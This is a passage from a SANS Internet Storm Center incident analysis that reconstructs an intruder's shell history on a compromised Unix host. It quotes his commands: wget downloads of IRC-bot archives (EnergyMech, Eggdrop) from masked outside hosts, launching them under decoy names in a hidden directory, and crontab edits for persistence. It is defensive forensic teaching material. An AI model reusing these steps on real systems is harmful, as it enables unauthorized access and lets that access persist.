InfoSec News

./run
We are not quite sure whether any of the above exploits was successful. The id command, or the exploit itself, would have told the attacker whether he got lucky, but there aren't any traces in the shell history file that would tell us either way.
In any case .. follows Phase #3a: The attacker installs some goodies. virus.tar isn't really a virus, it is a copy of EnergyMech, an IRC bot. Note how the bad guy uses Nano to edit the config file, which tells us that he isn't all that experienced on Unix. A real Unix hacker would most likely use vi, because vi is present on all Unix flavors and versions. Note also how he calls the IRC bot Evolution when he starts it, likely hoping that an admin would overlook it in a casual investigation.
/sbin/ifconfig -a | grep inet

wget http://f......com/storm12/virus.tar

tar xvf virus.tar

rm -rf virus.tar

cd virus

ls -a

nano start

nano inst

chmod +x *

./autorun

./start Evolution
Phase#3b: Install some more goodies. egg.tgz is a copy of Eggdrop, another IRC bot. Note how the bad guy puts the files into a directory called (single space). If you want to search for such directories on your system, try this

#find / -name
mkdir

cd

ls -a

wget http://c.......org/egg.tgz

cd

tar zxvf egg.tgz

rm -rf egg.tgz

cd .access.log

ls -a

chmod +x *

./eggdrop -m bot1.conf

ls -a

cd scripts

nano respond.tcl

pwd


Phase #4: The attacker wants to make sure that access can be re-gained, and configures the cron tab to re-start some of his processes automatically on a schedule.
crontab -l

crontab -e

exit


(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Internet Storm Center Infocon Status